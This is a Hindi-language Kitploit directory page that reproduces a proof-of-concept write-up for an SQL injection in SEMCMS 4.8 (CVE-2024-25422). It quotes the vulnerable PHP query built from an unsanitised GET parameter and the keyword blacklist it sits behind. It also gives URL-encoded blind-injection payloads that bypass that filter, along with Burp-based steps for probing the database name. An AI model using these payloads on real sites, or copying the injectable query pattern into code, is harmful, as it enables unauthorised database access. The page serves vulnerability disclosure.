Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tzyyyyyyy/semcms
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtzyyyyyyy/semcms

semcms

semcms में SQL इंजेक्शन मौजूद है (CVE-2024-25422)

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Semcms का परिचय

SEMCMS एक विदेशी व्यापार वेबसाइट सामग्री प्रबंधन प्रणाली (CMS) है जो कई भाषाओं का समर्थन करती है।

root@kitploit:~
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

कमजोरियों के कारण:

/xcR45q_Admin/SEMCMS_Menu.php पंक्ति 66

भेद्यता कोड:

root@kitploit:~
<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

यह देखा जा सकता है कि यहाँ ID, GET के माध्यम से पैरामीटर पास करने पर एक SQL स्टेटमेंट निष्पादित करेगा

फ़िल्टर कोड: /Include/contorl. PHP

पंक्ति 151

root@kitploit:~
function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

और 8वीं पंक्ति

root@kitploit:~
function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

उपरोक्त सामग्री को फ़िल्टर करके, हम एक पेलोड बना सकते हैं

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

कमजोरियों का पुनरुत्पादन

एक वेबसाइट पर जाएँ

root@kitploit:~
http://url/xcR45q_Admin/SEMCMS_Menu.php

Brupsuite पैकेट कैप्चर करें। नई साइट बनाते समय डेटाबेस नाम की लंबाई 5 होने के कारण, पेलोड इस प्रकार बनाया गया है:

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

(निर्धारित करें कि डेटाबेस नाम की लंबाई 5 है या नहीं)

पेलोड डालकर इको देखें

clip_image002

इस समय पेलोड बदलें

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,54,36)

(निर्धारित करें कि डेटाबेस नाम की लंबाई 6 है या नहीं)

इस समय पेलोड बदलें

clip_image004

भविष्य में पृष्ठ में बदलावों के आधार पर SQL इंजेक्शन जारी रखा जा सकता है।

टूल डाउनलोड करें